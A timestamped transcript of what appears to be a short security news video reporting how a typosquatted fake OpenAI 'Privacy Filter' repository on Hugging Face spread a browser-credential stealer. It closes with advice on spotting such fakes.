Fake OpenAI Repo on Hugging Face Stole Browser Passwords

Added: 2026-05-17

[00:00:00]A fake OpenAI repository spent the last few days at the top of Hugging Face's trending list, and anyone who ran the code walked away with browser passwords and cookies stolen.

[00:00:12]Hugging Face is the public hub where machine learning models live. Kind of like the GitHub of AI. On April 22nd, OpenAI released a real model there called Privacy Filter. It's an openweight tool that detects and redacts personal information from text and runs locally so that data never has to leave your machine. Two weeks later, a brand new account called Open OSS posted a repository with the same name and a model card copy pasted nearly verbatim from Open AIS.

[00:00:47]Researchers at Hidden Layer flagged it on May 7th, but by then it had reached number one on the trending list and racked up 244,000 downloads. Hidden Layer notes the count may have been inflated and most of the 667 accounts that like the repo appear to be autogenerated.

[00:01:08]The repo's install instructions told users to clone it and run an included setup script. On Windows, that was a batch file. On Linux and Mac, it was a script called loader. py. That script disabled SSL verification, decoded a hidden URL, and fetched a PowerShell command that ran in an invisible window.

[00:01:31]The command pulled down another batch file, escalated to admin, and dropped the final payload, which was a rustbased info stealer called Sapphira, added it to Microsoft Defender's exclusions, and then ran it. Sapphira targets browser data from Chrome, Edge, Firefox, and other major browsers. It grabs things like cookies, saved passwords, encryption keys. Hugging face removed the repo after reports came in.

[00:02:01]But this is another supply chain story like the Pippi elementary data one I covered a couple weeks back except this one uses typo squatting.

[00:02:12]This is the kind of attack that catches people new to AI and those people may not have noticed the odd installation instructions. The standard way to load a hugging face model is one line of Python through the transformers library. No git clone, no setup script. Unfortunately, the AI space is full of people who'd love you to copy paste those steps without thinking. My advice is before you run anything from a public repo or paste arbitrary commands from a public website, be sure you know what those commands do and what that repo does.

[00:02:48]This one had plenty of red flags. a brand new account, a disabled community tab, and installation installation instructions that don't match how you normally use that platform.